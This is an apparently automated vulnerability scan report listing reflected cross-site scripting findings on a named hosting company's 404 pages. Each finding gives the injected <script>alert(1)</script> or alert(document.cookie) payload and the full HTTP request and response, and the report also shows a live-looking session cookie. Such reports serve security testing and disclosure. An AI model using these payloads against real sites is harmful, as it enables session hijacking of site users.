GET /order.phpd754c%3C/css/alert.css?d78b0</title><script>alert(1)</script>662b60c430c=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/css/alert.css?d78b0</title><script>alert(1)</script>662b60c430c=1 on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6182"><script>alert(1)</script>41c59ed13ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3Cc6182"><script>alert(1)</script>41c59ed13ef/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3Cc6182"><script>alert(1)</script>41c59ed13ef/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Se ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload f87f7</title><script>alert(1)</script>21c63241421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3Cf87f7</title><script>alert(1)</script>21c63241421/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:33 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3Cf87f7</title><script>alert(1)</script>21c63241421/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b21e5<script>alert(1)</script>5f6ce4edc75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3Cb21e5<script>alert(1)</script>5f6ce4edc75/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:33 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a15<script>alert(1)</script>4d65bfb3aab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C84a15<script>alert(1)</script>4d65bfb3aab/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:36 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 68974</title><script>alert(1)</script>4a7c6c92937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C68974</title><script>alert(1)</script>4a7c6c92937/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:37 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C68974</title><script>alert(1)</script>4a7c6c92937/js/mootools.js on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db95"><script>alert(1)</script>96dc49f22e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C4db95"><script>alert(1)</script>96dc49f22e2/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:35 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C4db95"><script>alert(1)</script>96dc49f22e2/js/mootools.js is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2a224<script>alert(1)</script>b16a0f06e29 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js2a224<script>alert(1)</script>b16a0f06e29/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"><script>alert(1)</script>28e70defdbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js68c58"><script>alert(1)</script>28e70defdbe/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:39 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js68c58"><script>alert(1)</script>28e70defdbe/mootools.js is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4f439</title><script>alert(1)</script>62f3efe0bb0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js4f439</title><script>alert(1)</script>62f3efe0bb0/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:40 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js4f439</title><script>alert(1)</script>62f3efe0bb0/mootools.js on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76f38"><script>alert(1)</script>3f407bab9e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js76f38"><script>alert(1)</script>3f407bab9e8 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:42 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js76f38"><script>alert(1)</script>3f407bab9e8 is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload bd5e0</title><script>alert(1)</script>ac77eec0355 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.jsbd5e0</title><script>alert(1)</script>ac77eec0355 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19875
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.jsbd5e0</title><script>alert(1)</script>ac77eec0355 on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f9cc4<script>alert(1)</script>286fa54c46d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.jsf9cc4<script>alert(1)</script>286fa54c46d HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:43 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19851
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.46. https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 8f496</title><script>alert(1)</script>1849b6a4117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?8f496</title><script>alert(1)</script>1849b6a4117=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19884
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?8f496</title><script>alert(1)</script>1849b6a4117=1 on Arvixe </title> ...[SNIP]...
1.47. https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90c92<script>alert(1)</script>8cb39d69983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?90c92<script>alert(1)</script>8cb39d69983=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1.48. https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca38c"><script>alert(1)</script>f31f2dfaf7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?ca38c"><script>alert(1)</script>f31f2dfaf7b=1 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E9112b65954e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:14:26 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.phpd754c%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js?ca38c"><script>alert(1)</script>f31f2dfaf7b=1 is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
2. Password field with autocomplete enabledpreviousnext There are 4 instances of this issue:
